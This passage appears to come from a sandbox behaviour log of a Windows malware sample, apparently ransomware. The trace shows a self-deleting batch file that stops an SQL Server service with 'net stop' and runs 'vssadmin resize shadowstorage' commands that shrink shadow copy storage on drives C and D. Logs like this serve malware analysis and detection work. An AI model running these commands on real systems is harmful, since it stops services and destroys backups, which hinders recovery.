Size=0x122) returned 0x3f7018 [0219.728] GetProcessHeap () returned 0x3e0000 [0219.728] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0219.728] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0219.728] GetProcessHeap () returned 0x3e0000 [0219.728] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0219.729] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0219.729] GetProcessHeap () returned 0x3e0000 [0219.729] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0219.729] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.730] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0219.730] GetLastError () returned 0x2 [0219.730] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0219.730] GetLastError () returned 0x2 [0219.731] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.731] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3fe0 [0219.731] FindClose (in: hFindFile=0x3f3fe0 | out: hFindFile=0x3f3fe0) returned 1 [0219.732] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0219.732] GetLastError () returned 0x2 [0219.732] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3fe0 [0219.732] FindClose (in: hFindFile=0x3f3fe0 | out: hFindFile=0x3f3fe0) returned 1 [0219.733] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.733] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0219.733] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0219.733] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0219.733] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0219.733] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQLServerOLAPService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQLServerOLAPService /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQLServerOLAPService /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x8e4, dwThreadId=0x880)) returned 1 [0219.738] CloseHandle (hObject=0x78) returned 1 [0219.738] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0219.738] GetProcessHeap () returned 0x3e0000 [0219.738] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0219.738] GetEnvironmentStringsW () returned 0x3f8408* [0219.738] GetProcessHeap () returned 0x3e0000 [0219.738] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0219.738] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0219.738] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0219.907] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0219.907] CloseHandle (hObject=0x74) returned 1 [0219.907] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0219.907] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0219.907] GetProcessHeap () returned 0x3e0000 [0219.907] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0219.907] GetEnvironmentStringsW () returned 0x3f8408* [0219.907] GetProcessHeap () returned 0x3e0000 [0219.907] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0219.908] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0219.908] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0219.908] GetProcessHeap () returned 0x3e0000 [0219.908] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0219.908] GetEnvironmentStringsW () returned 0x3f8408* [0219.908] GetProcessHeap () returned 0x3e0000 [0219.908] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0219.908] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0219.908] GetProcessHeap () returned 0x3e0000 [0219.908] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0219.908] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0219.908] _get_osfhandle (_FileHandle=1) returned 0x264 [0219.908] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0219.908] _get_osfhandle (_FileHandle=1) returned 0x264 [0219.908] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0219.908] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0219.908] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0219.909] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0219.909] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0219.909] SetConsoleInputExeNameW () returned 0x1 [0219.909] GetConsoleOutputCP () returned 0x1b5 [0219.909] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0219.909] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.909] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0219.909] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0219.910] _get_osfhandle (_FileHandle=3) returned 0x74 [0219.910] SetFilePointer (in: hFile=0x74, lDistanceToMove=6331, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x18bb [0219.910] GetProcessHeap () returned 0x3e0000 [0219.910] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0219.910] GetProcessHeap () returned 0x3e0000 [0219.910] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0219.910] GetProcessHeap () returned 0x3e0000 [0219.910] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0219.910] GetProcessHeap () returned 0x3e0000 [0219.910] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0219.910] GetProcessHeap () returned 0x3e0000 [0219.910] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0219.910] GetProcessHeap () returned 0x3e0000 [0219.910] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0219.910] GetProcessHeap () returned 0x3e0000 [0219.910] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0219.910] GetProcessHeap () returned 0x3e0000 [0219.910] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0219.910] GetProcessHeap () returned 0x3e0000 [0219.910] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0219.910] GetProcessHeap () returned 0x3e0000 [0219.910] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0219.910] GetProcessHeap () returned 0x3e0000 [0219.910] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0219.910] GetProcessHeap () returned 0x3e0000 [0219.910] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0219.910] GetProcessHeap () returned 0x3e0000 [0219.910] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffaf0 | out: hHeap=0x3e0000) returned 1 [0219.910] _get_osfhandle (_FileHandle=3) returned 0x74 [0219.910] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x18bb [0219.910] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x6, lpOverlapped=0x0) returned 1 [0219.910] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=6, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="del %0op MSSQLServerOLAPService /y\r\n¥ /y\r\ny\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 6 [0219.911] _get_osfhandle (_FileHandle=3) returned 0x74 [0219.911] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x18c1 [0219.911] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf140, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf140*=0x0, lpOverlapped=0x0) returned 1 [0219.911] GetLastError () returned 0x0 [0219.911] _get_osfhandle (_FileHandle=3) returned 0x74 [0219.911] GetFileType (hFile=0x74) returned 0x1 [0219.911] _get_osfhandle (_FileHandle=3) returned 0x74 [0219.912] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x18c1 [0219.912] GetProcessHeap () returned 0x3e0000 [0219.912] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x400ad8 [0219.912] GetProcessHeap () returned 0x3e0000 [0219.912] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x400ad8 | out: hHeap=0x3e0000) returned 1 [0219.912] GetProcessHeap () returned 0x3e0000 [0219.912] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xd6) returned 0x3f81f8 [0219.912] _tell (_FileHandle=3) returned 6337 [0219.912] _close (_FileHandle=3) returned 0 [0219.912] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0219.912] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0219.912] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0219.912] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.912] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f4a80, Size=0xd6) returned 0x3f4a80 [0219.912] GetProcessHeap () returned 0x3e0000 [0219.912] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4a80) returned 0xd6 [0219.913] GetProcessHeap () returned 0x3e0000 [0219.913] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a4) returned 0x3f6cf0 [0219.913] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0xd6) returned 0x3f6cf0 [0219.913] GetProcessHeap () returned 0x3e0000 [0219.913] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0xd6 [0219.914] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x3bebd4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0219.914] GetProcessHeap () returned 0x3e0000 [0219.914] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x38) returned 0x3f3f90 [0219.914] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x3bdc64 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0219.914] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x3bde94, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x3bde98, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x3bde94*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0219.914] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0219.914] GetProcessHeap () returned 0x3e0000 [0219.914] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x2c) returned 0x3e1290 [0219.914] GetProcessHeap () returned 0x3e0000 [0219.914] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x258) returned 0x3f6dd0 [0219.916] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f7038 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0219.916] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat", nBufferLength=0x104, lpBuffer=0x3be2b8, lpFilePart=0x3be2a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat", lpFilePart=0x3be2a0*="c48c75d7__.bat") returned 0x63 [0219.916] SetErrorMode (uMode=0x0) returned 0x1 [0219.925] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat", fInfoLevelId=0x0, lpFindFileData=0x3f8414, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3f8414) returned 0x3f3fd0 [0219.925] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat")) returned 1 [0219.926] FindNextFileW (in: hFindFile=0x3f3fd0, lpFindFileData=0x3f8414 | out: lpFindFileData=0x3f8414*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xde382f00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xde382f00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xde382f00, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x18c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="c48c75d7__.bat", cAlternateFileName="C48C75~1.BAT")) returned 0 [0219.927] GetLastError () returned 0x12 [0219.927] FindClose (in: hFindFile=0x3f3fd0 | out: hFindFile=0x3f3fd0) returned 1 [0219.927] GetProcessHeap () returned 0x3e0000 [0219.927] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8408 | out: hHeap=0x3e0000) returned 1 [0219.928] GetProcessHeap () returned 0x3e0000 [0219.928] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x400af0 | out: hHeap=0x3e0000) returned 1 [0219.928] GetProcessHeap () returned 0x3e0000 [0219.928] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0219.928] GetProcessHeap () returned 0x3e0000 [0219.928] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4c48 | out: hHeap=0x3e0000) returned 1 [0219.928] GetProcessHeap () returned 0x3e0000 [0219.928] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7248 | out: hHeap=0x3e0000) returned 1 [0219.928] GetProcessHeap () returned 0x3e0000 [0219.928] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7030 | out: hHeap=0x3e0000) returned 1 [0219.928] GetProcessHeap () returned 0x3e0000 [0219.928] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6dd0 | out: hHeap=0x3e0000) returned 1 [0219.928] GetProcessHeap () returned 0x3e0000 [0219.928] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0219.928] GetProcessHeap () returned 0x3e0000 [0219.928] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0219.928] GetProcessHeap () returned 0x3e0000 [0219.928] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9bc8 | out: hHeap=0x3e0000) returned 1 [0219.928] GetProcessHeap () returned 0x3e0000 [0219.928] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0219.928] _get_osfhandle (_FileHandle=1) returned 0x264 [0219.928] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0219.928] _get_osfhandle (_FileHandle=1) returned 0x264 [0219.928] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0219.928] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0219.928] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0219.929] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0219.929] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0219.929] SetConsoleInputExeNameW () returned 0x1 [0219.929] GetConsoleOutputCP () returned 0x1b5 [0219.929] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0219.929] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.929] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0219.929] GetLastError () returned 0x2 [0219.929] _get_osfhandle (_FileHandle=2) returned 0x26c [0219.929] GetFileType (hFile=0x26c) returned 0x3 [0219.930] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236c, dwLanguageId=0x0, lpBuffer=0x4a994640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The batch file cannot be found.\r\n") returned 0x21 [0219.930] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236c, dwLanguageId=0x0, lpBuffer=0x4a994640, nSize=0x2000, Arguments=0x3bf280 | out: lpBuffer="The batch file cannot be found.\r\n") returned 0x21 [0219.930] _get_osfhandle (_FileHandle=2) returned 0x26c [0219.930] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The batch file cannot be found.\r\n", cchWideChar=-1, lpMultiByteStr=0x4a986640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The batch file cannot be found.\r\n", lpUsedDefaultChar=0x0) returned 34 [0219.930] WriteFile (in: hFile=0x26c, lpBuffer=0x4a986640, nNumberOfBytesToWrite=0x21, lpNumberOfBytesWritten=0x3bf258, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x3bf258, lpOverlapped=0x0) returned 0 [0219.930] GetLastError () returned 0xe8 [0219.930] exit (_Code=1) Process: id = "3" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x4aeaf000" os_pid = "0x91c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 10 os_tid = 0x920 Thread: id = 11 os_tid = 0x924 Thread: id = 12 os_tid = 0x928 Thread: id = 13 os_tid = 0x92c Thread: id = 14 os_tid = 0x930 Process: id = "4" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x4fb63000" os_pid = "0x934" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x91c" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:00078fbb" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 15 os_tid = 0x950 Thread: id = 16 os_tid = 0x94c Thread: id = 17 os_tid = 0x948 Thread: id = 18 os_tid = 0x944 [0034.697] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf5d730 | out: lpSystemTimeAsFileTime=0xf5d730*(dwLowDateTime=0xdf0746a0, dwHighDateTime=0x1d57a86)) [0034.697] GetCurrentProcessId () returned 0x934 [0034.697] GetCurrentThreadId () returned 0x944 [0034.697] GetTickCount () returned 0x1143c36 [0034.697] QueryPerformanceCounter (in: lpPerformanceCount=0xf5d738 | out: lpPerformanceCount=0xf5d738*=15498195420) returned 1 [0034.697] malloc (_Size=0x100) returned 0x188e80 [0219.394] free (_Block=0x188e80) Thread: id = 19 os_tid = 0x940 Thread: id = 20 os_tid = 0x93c Thread: id = 21 os_tid = 0x938 Thread: id = 24 os_tid = 0x964 Thread: id = 26 os_tid = 0x96c Thread: id = 561 os_tid = 0x8c8 Process: id = "5" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x49db4000" os_pid = "0x958" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 22 os_tid = 0x95c Thread: id = 23 os_tid = 0x960 Thread: id = 25 os_tid = 0x968 Thread: id = 28 os_tid = 0x9ec Thread: id = 29 os_tid = 0x9f0 Process: id = "6" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x4a1b9000" os_pid = "0x9f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 30 os_tid = 0x9fc Thread: id = 31 os_tid = 0xa00 Thread: id = 32 os_tid = 0xa04 Thread: id = 33 os_tid = 0xa08 Thread: id = 34 os_tid = 0xa0c Process: id = "7" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root 